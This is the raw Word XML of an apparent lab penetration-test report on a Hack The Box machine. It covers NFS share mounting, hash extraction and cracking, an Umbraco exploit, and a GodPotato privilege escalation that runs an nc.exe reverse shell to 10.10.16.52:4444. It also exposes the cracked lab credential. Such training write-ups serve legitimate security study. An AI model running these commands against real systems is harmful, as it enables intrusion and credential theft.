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77E18" w14:textId="15762D9F" w:rsidR="00C806EA" w:rsidRDefault="00AB5325" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD218D" w14:textId="2F58300E" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc92992244"/>
      <w:bookmarkStart w:id="1" w:name="_Toc151462878"/>
      <w:bookmarkStart w:id="2" w:name="_Toc205375818"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve">Target #1 – </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00AB5325" w:rsidRPr="00AB5325">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>10.129.230.172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D1F53" w14:textId="298F87BD" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc92992251_Copy_1"/>
      <w:bookmarkStart w:id="4" w:name="_Toc151462879"/>
      <w:bookmarkStart w:id="5" w:name="_Toc205375819"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-ZA"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Access – </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4F878BCB" w14:textId="50AA1FB7" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0AC004" w14:textId="09D522F1" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Vulnerability Fix:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75280E" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E6951" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Steps to reproduce the attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6B262A" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc205375820"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc151462880"/>
      <w:bookmarkStart w:id="8" w:name="_Toc92992245"/>
      <w:r>
        <w:t>ervice Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="55A3D5A6" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Port Scan Results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8861" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="5" w:type="dxa"/>
          <w:right w:w="5" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1719"/>
        <w:gridCol w:w="7142"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C806EA" w14:paraId="11C06368" w14:textId="77777777" w:rsidTr="000E2153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2A95" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/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IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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5179" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRDefault="00C806EA" w:rsidP="00C806EA">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/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Ports Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C806EA" w14:paraId="4AD75EAD" w14:textId="77777777" w:rsidTr="000E2153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23518" w14:textId="40627779" w:rsidR="00C806EA" w:rsidRDefault="00AB5325" w:rsidP="00C806EA">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AB5325">
              <w:rPr>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>10.129.230.172</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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C18FD" w14:textId="25EA3BA3" w:rsidR="00C806EA" w:rsidRPr="00AB5325" w:rsidRDefault="00C806EA" w:rsidP="00AB5325">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00AB5325" w:rsidRPr="00AB5325">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>21,80,111,135,139,445,2049,5985,47001,49664,49665,49666,49667,49678,49679,49680</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4357F89A" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRPr="00AE726A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b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:rtl/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE726A">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>As part of the enumeration process for the standalone (SA) machines, I developed a custom script to automate and standardize Nmap scans across multiple targets. The script is presented below and is included here for reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8F90C" w14:textId="77777777" w:rsidR="00C806EA" w:rsidRPr="00AE726A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b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:rtl/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE726A">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Please note: this script will be used consistently throughout the assessment for scanning SA machines. To avoid redundancy, I will not reintroduce the script in each machine’s section. Instead, I will refer back to this initial instance whenever applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF7DE1" w14:textId="3AF561BF" w:rsidR="005E7D6B" w:rsidRDefault="00C806EA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The python script called oscpSAscan.py – you can find it here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C806EA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
            <w:noProof/>
            <w:lang w:bidi="he-IL"/>
          </w:rPr>
          <w:t>oscpSAscan.py tool</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244B5C55" w14:textId="31D39FFD" w:rsidR="00C806EA" w:rsidRDefault="001F2A6F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1F2A6F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EAD8E05" wp14:editId="032E18E2">
            <wp:extent cx="5677692" cy="6763694"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133191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2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47A03659" w14:textId="77777777" w:rsidTr="005734A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C8D6674" w14:textId="301ADA94" w:rsidR="005734A9" w:rsidRDefault="005734A9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showmount -e 10.129.230.172</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51014105" w14:textId="3B508870" w:rsidR="001F2A6F" w:rsidRDefault="005734A9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5734A9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B8F0B81" wp14:editId="59B90D08">
            <wp:extent cx="4001058" cy="905001"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="92494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49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25F86C25" w14:textId="77777777" w:rsidTr="005734A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7914972C" w14:textId="3CA5C940" w:rsidR="005734A9" w:rsidRDefault="005734A9" w:rsidP="005734A9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mkdir nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C56FADF" w14:textId="7DF2A8D0" w:rsidR="005734A9" w:rsidRDefault="005734A9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5734A9">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61432E5E" wp14:editId="72952B59">
            <wp:extent cx="3972479" cy="543001"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="673023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313" name="Picture 1" descr="A black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734A9" w14:paraId="63FC4F9F" w14:textId="77777777" w:rsidTr="005734A9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41E75D8A" w14:textId="0FBE6AE2" w:rsidR="005734A9" w:rsidRDefault="005734A9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5734A9">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>sudo mount -t nfs 10.129.230.172:/site_backups ./nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="184A39B9" w14:textId="4450B338" w:rsidR="005734A9" w:rsidRDefault="008575A3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75A3">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66F8427C" wp14:editId="0A813064">
            <wp:extent cx="4648849" cy="590632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153042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235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184260F4" w14:textId="77777777" w:rsidTr="00DD6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA42C40" w14:textId="006DA9D0" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07" w:rsidP="00DD6D07">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto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gobuster dir -u http://10.129.230.172/ -w /home/kali/OSCPWordlists/big+common.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF38070" w14:textId="35AD1241" w:rsidR="008575A3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rtl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4BA227BF" wp14:editId="26DBA5F3">
            <wp:extent cx="3762900" cy="171474"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="151400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06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D3E7" w14:textId="6D9D5414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rtl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47AF7395" wp14:editId="30F1FFC2">
            <wp:extent cx="5239481" cy="3429479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27283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8BDA" w14:textId="1B035710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6A2FBF13" wp14:editId="41BDD80A">
            <wp:extent cx="5943600" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="202886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61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2A97E13D" w14:textId="77777777" w:rsidTr="00DD6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C54294" w14:textId="1F8DE99D" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07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strings Umbraco.sdf | grep admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="004E1268" w14:textId="4D5D23F9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0939E9FE" wp14:editId="2563A997">
            <wp:extent cx="5943600" cy="1403350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="46964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9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E19D" w14:textId="6B1FEE7A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>Cracked the hash with john:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBC82E" w14:textId="0DBB9AC1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712C9149" wp14:editId="0F30F652">
            <wp:extent cx="5943600" cy="2099945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13144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76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977E" w14:textId="46913EDA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The hash: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6D07">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>b8be16afba8c314ad33d812f22a04991b90e2aaa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6D07" w14:paraId="0BDB8EA6" w14:textId="77777777" w:rsidTr="00DD6D07">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC3CEA5" w14:textId="2D18D205" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07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DD6D07">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>john hash --wordlist=/usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66031681" w14:textId="5D0C6EE2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Cracked: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD6D07">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>baconandcheese</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA9F5EA" w14:textId="77777777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1EF1C34B" w14:textId="491C840F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00FA38C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
            <w:noProof/>
            <w:lang w:bidi="he-IL"/>
          </w:rPr>
          <w:t>admin@htb.local</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="492C2A51" w14:textId="77777777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7437FCA8" w14:textId="154A0DB6" w:rsidR="00DD6D07" w:rsidRDefault="00DD6D07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DD6D07">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54FCB1B1" wp14:editId="7D39C470">
            <wp:extent cx="5229955" cy="3448531"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="111855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6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B637" w14:textId="66763059" w:rsidR="00DD6D07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5F29C46F" wp14:editId="73C40C74">
            <wp:extent cx="5943600" cy="67945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="14295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59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2776" w14:paraId="741FDFA6" w14:textId="77777777" w:rsidTr="00B82776">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8E7B61" w14:textId="558E428A" w:rsidR="00B82776" w:rsidRDefault="00B82776" w:rsidP="00C806EA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>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t xml:space="preserve">Searchsploit -m </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82776">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>aspx/webapps/49488.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69F24386" w14:textId="77777777" w:rsidR="00B82776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6A9F8905" wp14:editId="05587896">
            <wp:extent cx="5943600" cy="535305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141000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07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471E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>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve">Got the code from here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00B82776">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
            <w:noProof/>
            <w:lang w:bidi="he-IL"/>
          </w:rPr>
          <w:t>Online - Reverse Shell Generator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77A5C69B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1E30CA0E" wp14:editId="50C44AE2">
            <wp:extent cx="3448531" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="160433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7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3E4" w14:textId="6DC929EF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595AAF6E" wp14:editId="3A34F06E">
            <wp:extent cx="4991797" cy="1371791"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="187870819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08195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677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27A2219D" w14:textId="37CF8734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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F82A7F0" wp14:editId="4271780E">
            <wp:extent cx="5601482" cy="3153215"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="193855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14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64" w14:paraId="0CA82B05" w14:textId="77777777" w:rsidTr="00850564">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C74B80" w14:textId="63DC8C4E" w:rsidR="00850564" w:rsidRDefault="00850564" w:rsidP="00B82776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850564">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>whoami /priv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54F4CADB" w14:textId="77777777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0C6AD3E0" w14:textId="313AAF8A" w:rsidR="00B82776" w:rsidRDefault="00B82776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B82776">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00850564" w:rsidRPr="00850564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336D1C19" wp14:editId="6568B51E">
            <wp:extent cx="5943600" cy="1917065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="186821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4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0564" w14:paraId="6ADB5853" w14:textId="77777777" w:rsidTr="00850564">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787CE7F3" w14:textId="412FC2F0" w:rsidR="00850564" w:rsidRDefault="00850564" w:rsidP="00B82776">
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00850564">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>.\GodPotato-NET4.exe -cmd "C:\Users\Public\nc.exe -e cmd.exe 10.10.16.52 4444"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="216B6B8F" w14:textId="471ED3D4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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B13A78" wp14:editId="512D3571">
            <wp:extent cx="5229955" cy="1848108"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="24734147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41472" name="Picture 1" descr="A computer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3344" w14:textId="6F8ACDA3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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AFFDFC0" wp14:editId="1A3430C3">
            <wp:extent cx="5943600" cy="2452370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="5218628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6282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9368" w14:textId="27B668A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  <w:r w:rsidRPr="00850564">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BD9A48A" wp14:editId="538BE8BD">
            <wp:extent cx="5591955" cy="3982006"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18135556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55698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257B" w14:textId="7777777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00A15CAF" w14:textId="77777777" w:rsidR="00850564" w:rsidRDefault="00850564" w:rsidP="00B82776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p w14:paraId="68E70575" w14:textId="0FBEC784" w:rsidR="00B82776" w:rsidRPr="00C806EA" w:rsidRDefault="00B82776" w:rsidP="00C806EA">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B82776" w:rsidRPr="00C806EA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440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="72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42A5D" w14:textId="77777777" w:rsidR="00CD3107" w:rsidRDefault="00CD3107">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B64E1BA" w14:textId="77777777" w:rsidR="00CD3107" w:rsidRDefault="00CD31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erif">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:altName w:val="Roboto"/>
